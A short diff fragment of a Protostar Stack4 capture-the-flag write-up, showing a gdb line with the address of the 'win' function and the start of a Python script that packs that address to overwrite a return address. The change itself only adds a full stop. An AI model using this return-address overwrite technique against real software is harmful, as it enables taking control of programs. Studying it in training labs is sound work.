Hep151/Protostar-Writeups/Stack/Stack4/Writeup.md

 ```
 $1 = {void (void)} 0x80483f4 <win>
 ```
-So win is at 0x80483f4, great now we just need to add that to our script instead of 'BBBB' as our return address
+So win is at 0x80483f4, great now we just need to add that to our script instead of 'BBBB' as our return address.
 ```
 import struct
 rp = struct.pack('<L', 0x80483f4)